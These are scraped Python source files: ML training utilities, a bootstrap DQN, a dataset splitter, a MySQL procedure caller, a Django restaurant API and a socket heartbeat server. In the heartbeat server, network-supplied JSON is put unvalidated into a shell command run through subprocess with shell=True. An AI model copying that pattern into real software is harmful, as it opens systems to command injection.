skimage.filters import gaussian\nfrom tqdm import tqdm\nimport wandb\n\nfrom .dataloader import BlurLoader\nimport trainer\n\n@trainer.Metric.register(\"ce_prior\")\nclass Test_Metric(trainer.Metric):\n def get_metrics(self):\n metricfun = torchmetrics.MetricCollection(\n [torchmetrics.Accuracy(), torchmetrics.ConfusionMatrix(num_classes=2)]\n )\n return metricfun\n\n\n@trainer.Dataset.register(\"ce_prior\")\nclass Blur_Dataset(trainer.Dataset):\n def get_transforms(self) -> Tuple[Any, Any]:\n transform = torchvision.transforms.Compose(\n [\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Grayscale()\n ]\n )\n return transform, transform\n\n def get_loaders(self):\n trainset = BlurLoader(blur_kernel=self.fspecial_gaussian_2d((self.kwargs[\"blur_size\"], self.kwargs[\"blur_size\"]), self.kwargs[\"blur_sigma\"]),\n sigma=self.kwargs[\"sigma\"],\n 
image_pth=self.path,\n tile_h=self.kwargs[\"tile_h\"],\n tile_w=self.kwargs[\"tile_w\"],\n tile_stride_factor_h=self.kwargs[\"tile_stride_factor_h\"],\n tile_stride_factor_w=self.kwargs[\"tile_stride_factor_w\"],\n mode=\"train\",\n mask_pth=self.kwargs[\"mask_pth\"],\n lwst_level_idx=self.kwargs[\"lwst_level_idx\"],\n threshold=self.kwargs[\"threshold\"],\n transform=self.train_transform)\n \n testset = BlurLoader(blur_kernel=self.fspecial_gaussian_2d((self.kwargs[\"blur_size\"], self.kwargs[\"blur_size\"]), self.kwargs[\"blur_sigma\"]),\n sigma=self.kwargs[\"sigma\"],\n image_pth=self.path,\n tile_h=self.kwargs[\"tile_h\"],\n tile_w=self.kwargs[\"tile_w\"],\n tile_stride_factor_h=self.kwargs[\"tile_stride_factor_h\"],\n tile_stride_factor_w=self.kwargs[\"tile_stride_factor_w\"],\n mode=\"test\",\n mask_pth=self.kwargs[\"mask_pth\"],\n lwst_level_idx=self.kwargs[\"lwst_level_idx\"],\n threshold=self.kwargs[\"threshold\"],\n transform=self.test_transform)\n \n trainloader = torch.utils.data.DataLoader(\n trainset, batch_size=self.train_batch_size, shuffle=True\n )\n testloader = torch.utils.data.DataLoader(\n testset, batch_size=self.test_batch_size, shuffle=True\n )\n return trainset, trainloader, testset, testloader\n\n @staticmethod\n def fspecial_gaussian_2d(size, sigma):\n kernel = np.zeros(tuple(size))\n kernel[size[0]//2, size[1]//2] = 1\n kernel = gaussian(kernel, sigma)\n return kernel/np.sum(kernel)\n\n\n@trainer.Logger.register(\"ce_prior\")\nclass CE_logger(trainer.Logger):\n def log_table(self, input, output, label, epoch):\n columns = [\"id\", \"image\", \"real class\", \"calculated class\"]\n table = wandb.Table(columns=columns)\n _, preds = torch.max(output.data, 1)\n for i in range(2):\n idx = f\"{epoch}_{i}\"\n image = wandb.Image(input[i].permute(1, 2, 0).cpu().numpy())\n table.add_data(idx, image, preds[i], label[i])\n self.log({\"table_key\": table})\n\n\n@trainer.Model.register(\"ce_prior\")\nclass CE_model(trainer.Model):\n def __init__(self,**kwargs):\n super().__init__()\n self.model = torchvision.models.__dict__[\"resnet18\"](pretrained=True)\n self.model.fc = torch.nn.Linear(self.model.fc.in_features, 2)\n\n def forward(self, x):\n output = self.model(x)\n return output\n\n\nclass TrainEngine(trainer.Trainer):\n def train(self):\n self.model.train()\n for data in tqdm(self.dataset.trainloader):\n image, label = data\n image, label = image.to(self.device), label.to(self.device)\n self.optimizer.zero_grad()\n outputs = self.model(image)\n loss = self.loss_fun(outputs, label)\n loss.backward()\n self.optimizer.step()\n # Track loss\n self.logger.track(loss_value=loss.item())\n # metric calculation\n self.metrics(outputs, label)\n # Logging loss\n self.logger.log({\"Epoch Train loss\": loss.item()})\n self.metrics.compute()\n self.metrics.log()\n print(\n \"Total Train loss: {}\".format(\n np.mean(self.logger.get_tracked(\"loss_value\"))\n )\n )\n\n def val(self):\n self.model.eval()\n for data in tqdm(self.dataset.testloader):\n image, label = data\n image, label = image.to(self.device), label.to(self.device)\n outputs = self.model(image)\n loss = self.loss_fun(outputs, label)\n # Track loss\n self.logger.track(loss_value=loss.item())\n # metric calculation\n self.metrics(outputs, label)\n # Logging loss\n self.logger.log({\"Epoch Train loss\": loss.item()})\n self.metrics.compute()\n self.metrics.log()\n if self.current_epoch % 5 == 0:\n self.logger.log_table(image, outputs, label, self.current_epoch)\n\n mean_loss = np.mean(self.logger.get_tracked(\"loss_value\")) 
/ len(\n self.dataset.testloader\n )\n print(\"Total Val loss: {}\".format(mean_loss))\n\n return self.metrics.results[\"val_Accuracy\"], mean_loss","repo_name":"Vishwesh4/PriorsDeconvolution","sub_path":"training/utils/trainutils.py","file_name":"trainutils.py","file_ext":"py","file_size_in_byte":5703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3005150915","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nfrom collections import namedtuple\nfrom drl_api.models import DQN_Model\nfrom drl_api.models import _DQN\nfrom drl_api.memory import ReplayMemory\n\nclass BootstrapDQN_Model(DQN_Model):\n ''' Base Bootstrap DQN Model, only supports convolutional features at the moment '''\n def __init__(self, huber_loss, n_heads, p=0.5, **kwargs):\n super().__init__(**kwargs)\n\n self.huber_loss = huber_loss\n self.n_heads = n_heads\n self.p = p\n self.replay_memory = ReplayMemory(self.memory_size,\n namedtuple('Transition',\n ('state',\n 'action',\n 'reward',\n 'next_state',\n 'terminal',\n 'mask'))\n )\n\n\n\n\n def init_networks(self):\n self.Q_eval = _BootDQN(n_heads=self.n_heads,\n n_dim=self.obs_shape[2],\n out_dim=self.n_actions,\n lr=self.lr,\n name='eval',\n gpu=self.gpu)\n\n self.Q_target = _BootDQN(n_heads=self.n_heads,\n n_dim=self.obs_shape[2],\n out_dim=self.n_actions,\n lr=self.lr,\n name='target',\n gpu=self.gpu)\n\n # weights initialization\n self.Q_eval.apply(self.Q_eval.init_weights)\n\n # eval-target setup\n self.replace_target_network()\n self.Q_eval.to(self.Q_eval.device)\n self.Q_target.to(self.Q_target.device)\n\n\n def learn(self, batch):\n self.Q_eval.optimizer.zero_grad()\n batch_dict = self.process_batch(batch)\n for key in batch_dict:\n batch_dict[key] = torch.tensor(batch_dict[key]).to(self.Q_eval.device)\n\n batch_size = batch_dict['state'].shape[0]\n batch_index = np.arange(batch_size, dtype=np.int32)\n\n # ddqn step\n q_eval = self.Q_eval.forward(batch_dict['state'], all=True)[batch_index, batch_dict['action']] # get q_evals for all n_heads\n q_next = self.Q_target.forward(batch_dict['next_state'], all=True)\n q_next_eval = self.Q_eval.forward(batch_dict['next_state'], all=True)\n q_next[batch_dict['terminal']] = 0.0\n q_next_eval[batch_dict['terminal']] = 0.0\n\n for i in range(self.n_heads):\n # sequentially backpropagate gradient info\n ddqn_idx = torch.argmax(q_next_eval[i], dim=1)\n q_target = batch_dict['reward'] + self.gamma * q_next[i][batch_index, ddqn_idx]\n loss = self.Q_eval.loss(q_target, q_eval[i]).to(self.Q_eval.device)\n loss.backward()\n\n self.Q_eval.optimizer.step()\n\n\n\n def store_transition(self, *args):\n ''' Implements Bernoulli mask '''\n args = args + (np.random.binomial(1, self.p, self.n_heads),)\n self.replay_memory.push(args)\n\n\nclass _BootDQN(_DQN):\n ''' Bootstrapped Deeeeep Q Network '''\n def __init__(self, n_heads, huber=False, *args, **kwargs):\n self.n_heads = n_heads\n super(_BootDQN, self).__init__(*args, **kwargs)\n\n # Make bootstrapped heads\n self.heads = [self.make_head(self.in_dim, self.out_dim) for _ in range(self.n_heads)]\n self.cur_head = None # index of current head, type: int\n self.huber_loss = huber\n # redefine loss function\n self.loss = nn.SmoothL1Loss() if self.huber_loss else nn.MSELoss()\n\n\n def make_head(self, in_dim, out_dim):\n ''' Creates a bootstrap head, universal approximators go brrrr '''\n return nn.Sequential(\n nn.Linear(in_dim, 512),\n nn.ReLU(),\n nn.Linear(512, out_dim)\n )\n\n\n def forward(self, x, all=False):\n 
x = torch.tensor(x, dtype=torch.float).to(self.device)\n        x = self.conv(x)\n        x = x.view(x.size(0), -1)\n        if not all:\n            q_vals = self.heads[self.cur_head](x)\n        else:\n            q_vals = [self.heads[i](x) for i in range(self.n_heads)]\n\n        return q_vals\n\n\n    def set_head(self, n):\n        self.cur_head = n","repo_name":"opent03/drl_api","sub_path":"drl_api/models/bootstrap_dqn.py","file_name":"bootstrap_dqn.py","file_ext":"py","file_size_in_byte":4478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75351621928","text":"\n#def divide_elementos_de_lista(lista, divisor):\n    #return [i / divisor for i in lista]\n\n\n#lista = list(range(10))\n#divisor = 0\n\n#print(divide_elementos_de_lista(lista, divisor))\n\n#Si tratamos de dividir por cero, tenemos una excepcion:\n#ZeroDivisionError: division by zero\n#Esto implica que el programa crasheo. Para evitar que esto suceda a nivel de usuario,\n#y para tener control sobre el uso de la funcion, podemos utilizar programacion defensiva\n#con las keyword 'try' y 'except':\n\ndef divide_elementos_de_lista(lista, divisor):\n    try:\n        return [i / divisor for i in lista]\n    except ZeroDivisionError as e:\n        print(e)\n        return lista\n\nlista = list(range(10))\ndivisor = 0\n\nprint(divide_elementos_de_lista(lista, divisor))\n\n#En este caso en primer lugar, con try intentara ejecutar la division\n#sin embargo, si por alguna razon surge la excepcion de ZeroDivisionError,\n#se le pide que retorne simplemente la lista para evitar el codigo de error y el crasheo.\n#Esto evidenciaria al usuario un error pero sin tirar abajo el programa.\n#De esta manera se hace el manejo de las excepciones.\n\n","repo_name":"alexisalt/curso_pensamiento_computacional","sub_path":"excepciones.py","file_name":"excepciones.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5497912045","text":"import os\nimport sys\nimport numpy as np\n\nnp.random.seed(123456)\n\n# ori_data contains original data\n# data will store new custom split data\ndata_path = 'experiments/tasks/ori_data'\ncustom_data_path = 'experiments/tasks/data'\n\nif not os.path.exists(custom_data_path):\n\tos.makedirs(custom_data_path)\n\ntask = sys.argv[1]\n\nif task == 'winogrande':\n\ttask = task + '/winogrande_1.1'\n\t\nfnames = os.listdir(os.path.join(data_path, task))\n\ndev_name = 'dev'\ntest_name = 'test'\ndev_files = []\nnum_examples = 0\nfor fname in fnames:\n\tif fname.endswith('gz'):\n\t\tcontinue\n\telif fname.startswith('valid'):\n\t\tdev_name = 'valid'\n\t\tdev_files.append(fname)\n\telif fname.startswith('val'):\n\t\tdev_name = 'val'\n\t\tdev_files.append(fname)\n\telif fname.startswith('dev'):\n\t\tdev_name = 'dev'\n\t\tdev_files.append(fname)\n\telif fname.startswith('tests'): # for piqa\n\t\ttest_name = 'tests'\n\telif fname.startswith('test'):\n\t\ttest_name = 'test'\n\nf = open(os.path.join(data_path, task, dev_files[0])).readlines()\nnum_examples = len(f)\ndev_idx = np.random.choice(num_examples, num_examples // 2, replace=False)\n\nprint(dev_files)\nprint(dev_name, test_name)\nfor fname in dev_files:\n\tf = open(os.path.join(data_path, task, fname)).readlines()\n\tfdev = open(os.path.join(custom_data_path, task, fname), 'w')\n\tftest = open(os.path.join(custom_data_path, task, fname.replace(dev_name, test_name)), 'w')\n\n\tprint(len(f), num_examples)\n\tassert len(f) == num_examples\n\tfor i in range(num_examples):\n\t    if i in dev_idx:\n\t        fdev.write(f[i])\n\t    
else:\n\t ftest.write(f[i])\n\tfdev.close()\n\tftest.close()\n\nprint(task)\nprint('Dev examples', len(dev_idx))\nprint('Test examples', num_examples - len(dev_idx))\n","repo_name":"nyu-mll/nlu-test-sets","sub_path":"irt_scripts/preproc_scripts/make_custom_split.py","file_name":"make_custom_split.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"12971687040","text":"import pymysql\nimport pymysql.cursors\ndatabaseCharset = \"utf8mb4\"\n# objetivando iniciar procedures que atualizarao o banco de dados\n\ncusrorType = pymysql.cursors.DictCursor\n\ndatabaseConnection = pymysql.connect(host='url host',\n user=\"login\",\n\n password=\"senha\",\n\n db=\"banco de dados\",\n\n charset=databaseCharset,\n\n cursorclass=cusrorType)\ntry:\n\n # Cursor object creation\n\n cursorObject = databaseConnection.cursor()\n\n # Execute the sqlQuery\n\n cursorObject.execute(\"call 1extrigger()\")\n databaseConnection.commit()\n print(\"executou a primeira do dia\")\n\n cursorObject.execute(\"DELETE FROM resultado WHERE 1\")\n cursorObject.execute(\"call 2gamefica_calcula()\")\n cursorObject.execute(\"call \t3gamefica_pontua()\")\n databaseConnection.commit()\n print(\"eita, rodou metade\")\n\n cursorObject.execute(\"call \tresultado_identifica_por_cpf()\")\n cursorObject.execute(\"DELETE FROM rankings WHERE 1\")\n cursorObject.execute(\"call joga_dados_ranking()\")\n # so far taking 9 to 10 min\n databaseConnection.commit()\n\n print(\"sera q rodou mesmo?\")\n\n # Print the result of the executed stored procedure\n\n for result in cursorObject.fetchall():\n\n print(result)\n\n\nexcept Exception as e:\n\n print(\"Exeception occured:{}\".format(e))\n\n\nfinally:\n\n databaseConnection.close()\n\nprint(\"did dis shid worked at all?\")\n","repo_name":"AugustoBaden/tcc-scripts","sub_path":"gamefication-tcc/callProc.py","file_name":"callProc.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36598104991","text":"import logging,json,os\nimport socket, sys ,threading ,signal,time,select\nimport urllib,urllib2\nimport subprocess\n\n# CRITICAL\t50\t严重错误,表明程序已不能继续运行了\n# ERROR\t 40\t严重的问题,程序已不能执行一些功能了\n# WARNING\t30\t有意外,将来可能发生问题,但依然可用\n# INFO\t 20\t证明事情按预期工作\n# DEBUG\t 10\t详细信息,调试问题时会感兴趣\n\n# create logger with name\n# if not specified, it will be root\nlogger = logging.getLogger('pikaqiu')\nlogger.setLevel(logging.DEBUG)\n\n# create a handler, write to log.txt\n# logging.FileHandler(self, filename, mode='a', encoding=None, delay=0)\n# A handler class which writes formatted logging records to disk files.\nfileHandler = logging.FileHandler('heartbeat.log')\nfileHandler.setLevel(logging.INFO)\n\n# create another handler, for stdout in terminal\n# A handler class which writes logging records to a stream\nstreamHandler = logging.StreamHandler()\nstreamHandler.setLevel(logging.DEBUG)\n\n# set formatter\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s :%(message)s')\nfileHandler.setFormatter(formatter)\nstreamHandler.setFormatter(formatter)\n\n# add handler to logger\nlogger.addHandler(fileHandler)\nlogger.addHandler(streamHandler)\n\nclass HeartBeat(object):\n def __init__(self, local_ip,local_port,buffer_size=4096,listen_number=5):\n self.local_ip=local_ip\n self.local_port=local_port\n self.buffer_size=buffer_size\n #上线节点信息列表\n self.node_list=[]\n self.request_list=[]\n #当前路径\n 
self.current_path=os.path.abspath(\".\")\n        logger.debug(self.current_path)\n        \n        self.receiveClient=True\n        self.receiveUser=True\n        self.stop=True\n        try:\n            self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n            #端口复用\n            self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) \n        except socket.error as e:\n            logger.critical(\"Error creating socket: %s\" %e)\n            sys.exit()\n        try:\n            self.server.bind((self.local_ip, self.local_port))\n        except socket.error as e:\n            logger.critical('Error binding socket: %s' %e)\n            sys.exit()\n        logger.debug(\"Socket bind complete\")\n        #设置同时接收的客户端最大请求数\n        self.server.listen(listen_number)\n        logger.debug(\"Socket now listening\")\n        \n    def get_nodeList(self):\n        return self.node_list\n\n    def receiveClientHeartBeat(self,sock,addr):\n        logger.debug('Accept new connection from %s:%s...' % (addr[0],addr[1]))\n        # 设置 recv 超时时间\n        sock.setblocking(False)\n        while self.receiveClient:\n            try: \n                ready = select.select([sock], [], [], 30)\n                if ready[0]:\n                    data = sock.recv(self.buffer_size) \n                    tmp = json.loads(data) \n                    #type=0为心跳包,type=1为请求视频回执包\n                    #list为心跳包,dict为请求视频回执包\n                    if isinstance(tmp,list):\n                        self.node_list = tmp\n                    else:\n                        if tmp['upload'] == True:\n                            cmd = \"vlc --extraintf=http:logger --verbose=2 --file-logging --logfile=vlc-log.txt\"\n                            cmd+=\" file://%s/vlc/sdp/%s.sdp\"% (self.current_path, tmp['node'])\n                            cmd+=\" :sout='#transcode{vcodec=theo,vb=800,acodec=vorb,ab=128,channels=2,samplerate=44100,scodec=none}\"\n                            cmd+=\":http{dst=:%s/demo.ogg}'\" % (tmp['node']+8080)\n                            cmd+=\" :no-sout-all :sout-keep vlc://quit\"\n                            subprocess.Popen(cmd,shell=True)\n                            logger.debug(\"开始串流\")\n                        else :\n                            logger.debug(\"取消\")\n                else:\n                    self.node_list=[]\n                    self.receiveClient=False\n                    self.receiveUser=False\n                    logger.debug('Connection from %s:%s timeout.' % addr)\n                    break\n                # logger.debug(node_list)\n            except socket.error as e:\n                self.receiveClient=False\n                self.receiveUser=False\n                logger.critical(\"current %s:%s tcp connection error %s\" % (addr[0],addr[1],e))\n                break\n        sock.close()\n        logger.debug('heartbeat Connection from %s:%s closed.' % addr)\n\n    #向节点num请求视频\n    def selectNode(self,num,call):\n        #call true为请求网络视频 false为停止接收\n        d = dict(node=num, port=8000+num*2, request=call)\n        d_string=json.dumps(d)\n        return d_string\n\n    def receiveUserCommand(self,sock,addr):\n        logger.debug('ready to request video from %s:%s...' % (addr[0],addr[1]))\n        while self.receiveUser:\n            try:\n                #把已上线的节点传给网页服务器\n                url = 'http://127.0.0.1:5000/nodelist'\n                headers = {'Content-Type': 'application/json'}\n                req=urllib2.Request(url,data=json.dumps(self.node_list),headers=headers)\n                response = urllib2.urlopen(req)\n                request_msg=response.read().decode('utf-8')\n                if request_msg == 'ok':\n                    pass\n                    # logger.debug('Data:%s'% request_msg)# 获取服务器返回的页面信息 \n                else :\n                    #寻找节点上传视频\n                    request = json.loads(request_msg)\n                    self.node_request=self.selectNode(request['node'],True)\n                    sock.send((self.node_request.decode('utf-8')).encode('utf-8'))\n            except socket.error as e:\n                logger.critical(\"current %s:%s tcp connection error %s\" % (addr[0],addr[1],e))\n                break\n            except urllib2.URLError as e:\n                self.receiveClient=False\n                self.receiveUser=False \n                logger.debug('current page return error %s'% e.reason)\n                break\n            time.sleep(1)\n        sock.close()\n        logger.debug('command Connection from %s:%s closed.' 
% addr)\n\n #退出线程中断处理函数\n def quit(self, signum, frame):\n # logger.debug(\"Got signal: %s\" % signum)\n pass\n\n def stopHeartBeat(self):\n self.receiveClient=False\n self.receiveUser=False\n self.stop=False\n\n def start(self):\n while self.stop:\n try:\n sock, addr = self.server.accept()\n logger.debug(addr)\n self.receiveClient=True\n self.receiveUser=True\n t1 = threading.Thread(target=self.receiveClientHeartBeat, args=(sock, addr))\n t2 = threading.Thread(target=self.receiveUserCommand, args=(sock, addr))\n t1.setDaemon(True)\n t2.setDaemon(True)\n t1.start()\n t2.start()\n except KeyboardInterrupt :\n self.receiveClient=False\n self.receiveUser=False\n self.stop=False\n logger.error(\"Program interrupted by user.\")\n break\n self.server.close()\n logger.debug('server had stopped work')\nif __name__ == '__main__':\n heartbeat=HeartBeat(\"0.0.0.0\",6000)\n heartbeat.start()","repo_name":"Pokerpoke/aero-node","sub_path":"an-web/heart_beat.py","file_name":"heart_beat.py","file_ext":"py","file_size_in_byte":7486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3235345086","text":"from turtle import*\nimport colorsys as cs\n\nspeed(\"fastest\")\nbgcolor(\"black\")\nhideturtle()\n\nfor i in range(100):\n pencolor(cs.hsv_to_rgb(i/100,.6,1))\n right(i+1)\n circle(170,i)\n fd(i)\n right(90)\n \nexitonclick()","repo_name":"Deep-Look-Academy/Python-Turtle-Graphics","sub_path":"11. Turtle Graphics - draw the Amazing design.py","file_name":"11. Turtle Graphics - draw the Amazing design.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26536722265","text":"import json\n\nfrom .models import *\nfrom user.models import Review, Review_image, Review_Star\nfrom user.utils import login_decorator\n\nfrom django.views import View\nfrom django.db.models import Avg\nfrom django.http import JsonResponse, HttpResponse\n\nclass TopTopic(View):\n def get(self, request, topic_id):\n\n try:\n topic_top_list = Topic_Top_list.objects.select_related('topic', 'top_list').filter(topic__id = topic_id)\n topic_title = topic_top_list[0].topic.title\n\n toplists = [{\n 'id' : toplist.top_list.id,\n 'title' : toplist.top_list.title,\n 'description' : toplist.top_list.description,\n 'image' : toplist.top_list.image\n } for toplist in topic_top_list ]\n\n return JsonResponse({'title' : topic_title, 'top_list' : toplists}, status=200)\n except Topic.DoesNotExist:\n return JsonResponse({'result' : 'DOES_NOT_EXIST_TOPIC'}, status = 400)\n\nclass RestaurantView(View):\n def get(self, request, topic_id):\n restaurants = Topic_Restaurant.objects.select_related('topic','restaurant').filter(topic_id = topic_id)\n\n if restaurants.exists(): \n topic_title = restaurants[0].topic.title\n restaurant_list= [{\n 'id' : element.restaurant.id,\n 'name' : element.restaurant.name,\n 'state' : element.restaurant.location_state.state,\n 'food' : element.restaurant.food.category,\n 'image' : element.restaurant.restaurant_image_set.get(restaurant_id = element.restaurant.id).images,\n 'grade' : element.restaurant.review_set.filter(restaurant_id = element.restaurant.id).values('review_star__star').aggregate(avg=Avg('review_star__star'))['avg']\n } for element in restaurants]\n return JsonResponse({\"title\" : topic_title, \"restaurant_list\" : restaurant_list}, status=200)\n else:\n return JsonResponse({\"message\":\"DOES_NOT_EXIST_TOPIC\"}, status = 400)\n\n\nclass 
DetailTopImage(View):\n def get(self, request, restaurant_id):\n image = Restaurant_image.objects.filter(restaurant_id = restaurant_id).values_list('images', flat=True)\n\n return JsonResponse({'image' : list(image)})\n\nclass RestaurantDetailInfoView(View):\n def get(self, request, restaurant_id):\n try:\n restaurant = Restaurant.objects.select_related('price_range', 'food', 'location_city', 'location_state', 'location_road', 'holiday').prefetch_related('menu_set','restaurant_info_set').get(id=restaurant_id)\n\n restaurant_top = {\"name\": restaurant.name, \"star\": restaurant.review_set.filter(restaurant_id = restaurant.id).values('review_star__star').aggregate(avg=Avg('review_star__star'))['avg']}\n title_dict = { \"parking\":\"주차\", \"number\":\"전화번호\", \"last_order\":\"마지막주문\", \"site\":\"웹 사이트\", \"breaktime\":\"쉬는시간\", \"opening_hours\":\"영업시간\"}\n\n result = []\n # address\n result.append({\n \"title\" : \"주소\",\n \"content\" : ['{} {} {} {}'.format(restaurant.location_city.city, restaurant.location_state.state, restaurant.location_road.road, restaurant.location_detail)] \n })\n # food\n result.append({\n \"title\" : \"음식 종류\",\n \"content\" : [restaurant.food.category]\n })\n # price\n result.append({\n \"title\" : \"가격대\",\n \"content\" : [restaurant.price_range.price_range]\n })\n # holiday\n result.append({\n \"title\" : \"휴일\",\n \"content\" : [restaurant.holiday.holiday] \n })\n \n info = restaurant.restaurant_info_set.values().get(restaurant_id = restaurant_id)\n for element in info :\n if element in title_dict and info[element] != None :\n result.append({\"title\" : title_dict[element], \"content\" : [info[element]]})\n\n # menu\n result.append({\n \"title\" : \"메뉴\",\n \"content\" : [\n {\n \"menu\" : element.menu,\n \"price\" : element.price \n }\n for element in restaurant.menu_set.filter(restaurant_id=restaurant_id) ]\n })\n\n return JsonResponse({\"top\": restaurant_top, \"result\":result}, status = 200)\n except Restaurant.DoesNotExist:\n return HttpResponse(status = 404)\n\nclass RestaurantDetailToplistView(View):\n def get(self, request, restaurant_id):\n toplists = Top_lists_Restaurant.objects.select_related('top_list', 'restaurant').filter(restaurant_id=restaurant_id)\n\n if toplists.exists():\n toplist = [\n {\n \"id\" : element.top_list.id,\n \"title\" : element.top_list.title,\n \"description\" : element.top_list.description,\n \"image\" : element.top_list.image\n } for element in toplists]\n return JsonResponse({\"result\" : toplist}, status = 200)\n else:\n return HttpResponse(status = 404)\n\nclass DetailReview(View):\n def get(self,request, restaurant_id):\n\n offset = request.GET.get('offset',0)\n limit = request.GET.get('limit', 5)\n review_star = request.GET.get('taste', 4)\n\n restaurant_review = Review.objects.select_related('user','review_star').prefetch_related('review_image_set').filter(restaurant_id = restaurant_id)\n \n if review_star == 4:\n restaurant_rate = restaurant_review.order_by('-create_at')\n else:\n restaurant_rate = restaurant_review.filter(review_star_id = review_star).order_by('-create_at')\n\n reviews = [\n {\n 'name' : review.user.nick_name,\n 'rating' : review.review_star.content,\n 'text' : review.content,\n 'imglist' : list(review.review_image_set.values_list('image', flat=True)),\n 'time' : str(review.create_at.year) + '-' + \n str(review.create_at.month) + '-' + \n str(review.create_at.day)\n }\n for review in list(restaurant_rate[int(offset):int(limit)])]\n\n return JsonResponse(\n {\n 'total_count' : 
restaurant_rate.count(),\n 'good_count' : restaurant_rate.filter(review_star_id = 1).count(),\n 'soso_count' : restaurant_rate.filter(review_star_id = 2).count(),\n 'bad_count' :restaurant_rate.filter(review_star_id = 3).count(),\n 'result' : reviews\n }\n )\n \n @login_decorator\n def post(self, request, restaurant_id):\n data = json.loads(request.body)\n user = request.user\n \n Review(\n user = user,\n restaurant_id = data[\"restaurant_id\"],\n content = data[\"content\"],\n review_star = Review_Star.objects.get(content = data[\"star\"])\n ).save()\n return HttpResponse(status = 200)\n\nclass RestaurantNearView(View):\n def get(self, request, restaurant_id):\n try:\n location_state = Restaurant.objects.get(id = restaurant_id).location_state\n around_restaurant = Restaurant.objects.select_related('food','location_state','price_range').prefetch_related('restaurant_image_set','review_set').filter(location_state_id = location_state.id)\n\n restaurants = [\n {\n 'id' : restaurant.id,\n 'title' : restaurant.name,\n 'food' :restaurant.food.category,\n 'price' : restaurant.price_range.price_range,\n 'location' : restaurant.location_state.state,\n 'img' : restaurant.restaurant_image_set.values('images')[0],\n 'avg' : restaurant.review_set.filter(restaurant_id = restaurant.id).values('review_star__star').aggregate(avg=Avg('review_star__star'))['avg']\n }\n for restaurant in list(around_restaurant)[:4]]\n\n return JsonResponse({'result' : restaurants}, status = 200)\n except Restaurant.DoesNotExist:\n return JsonResponse({\"message\":\"DOES_NOT_EXIST_RESTAURANT\"}, status = 400)\n\nclass RestaurantDetailToplistRelatedView(View):\n def get(self, request, restaurant_id):\n try:\n toplist_id = Top_lists_Restaurant.objects.filter(restaurant_id=restaurant_id).select_related('top_list').order_by('top_list__create_at')[0].top_list_id\n restaurants = Top_lists_Restaurant.objects.select_related('top_list','restaurant').filter(top_list_id = toplist_id)[:4]\n toplist_title = restaurants[0].top_list.title\n\n restaurant_list = [{\n 'id' : element.restaurant.id,\n 'name' : element.restaurant.name,\n 'state' : element.restaurant.location_state.state,\n 'food' : element.restaurant.food.category,\n 'image' : element.restaurant.restaurant_image_set.get(restaurant_id = element.restaurant.id).images,\n 'grade' : element.restaurant.review_set.filter(restaurant_id = element.restaurant.id).values('review_star__star').aggregate(avg=Avg('review_star__star'))['avg']\n } for element in restaurants]\n\n return JsonResponse({\"title\" : toplist_title, \"restaurant_list\" : restaurant_list}, status=200)\n\n except IndexError:\n return HttpResponse(status = 400)\n\nclass RestaurantTagview(View):\n def get(self, request, restaurant_id):\n\n restaurant_tags = Restaurant_Tag.objects.select_related('restaurant','tag').filter(restaurant_id = restaurant_id)\n tags = [\n { \n 'id' : tag.tag.id,\n 'tag' : tag.tag.tag\n }\n for tag in restaurant_tags]\n\n return JsonResponse({'result' : tags}, status = 200)\n\nclass RestaurantEatDealView(View):\n def get(self,request):\n \n offset = int(request.GET.get('offset', 0))\n limit = int(request.GET.get('limit', 20))\n\n eat_deal_list = Eat_Deal.objects.select_related('restaurant')[offset * limit:(offset + 1) * limit]\n eat_deals = [\n {\n 'offset' : offset,\n 'eat_deal_id' :eat_deal.id,\n 'title' : eat_deal.restaurant.name,\n 'restaurant_id' : eat_deal.restaurant.id,\n 'image' : list(eat_deal.restaurant.restaurant_image_set.values('images'))[0],\n 'menu' : eat_deal.menu,\n 'discount_rate' : 
eat_deal.discount_rate,\n 'price' : int(eat_deal.price),\n 'discounted_price' : int(eat_deal.price) - (int(eat_deal.price) * int(eat_deal.discount_rate)/100)\n }\n for eat_deal in list(eat_deal_list)]\n\n return JsonResponse({'result' : eat_deals}, status=200)\n\nclass RestaurantEatDealSearchView(View):\n def get(self, request):\n\n eat_deal_list = request.GET.getlist('list')\n\n offset = int(request.GET.get('offset', 0))\n limit = int(request.GET.get('limit', 20))\n\n eat_deal_list = Eat_Deal.objects.select_related('restaurant').filter(restaurant__location_state__in = eat_deal_list)[offset * limit:(offset + 1) * limit]\n eat_deals = [\n {\n 'offset' : offset,\n 'eat_deal_id' :eat_deal.id,\n 'title' : eat_deal.restaurant.name,\n 'restaurant_id' : eat_deal.restaurant.id,\n 'image' : list(eat_deal.restaurant.restaurant_image_set.values('images'))[0],\n 'menu' : eat_deal.menu,\n 'discount_rate' : eat_deal.discount_rate,\n 'price' : int(eat_deal.price),\n 'discounted_price' : int(eat_deal.price) - (int(eat_deal.price) * int(eat_deal.discount_rate)/100)\n }\n for eat_deal in list(eat_deal_list)]\n\n return JsonResponse({'result' : eat_deals}, status=200)\n\nclass SearchView(View):\n def get(self, request):\n data = request.GET.get('text', None)\n\n restaurants = Restaurant.objects.filter(name__icontains = data)\n result = [restaurant.name for restaurant in restaurants]\n\n return JsonResponse({\"result\":result}, status =200)\n\nclass SearchFinalView(View):\n def get(self, request, text):\n restaurants = Restaurant.objects.select_related('food', 'location_city', 'location_state', 'location_road').filter(name__icontains = text)\n\n if restaurants.exists(): \n restaurant_list= [{\n 'id' : element.id,\n 'name' : element.name,\n 'state' : element.location_state.state,\n 'address': '{} {} {} {}'.format(element.location_city.city, element.location_state.state, element.location_road.road, 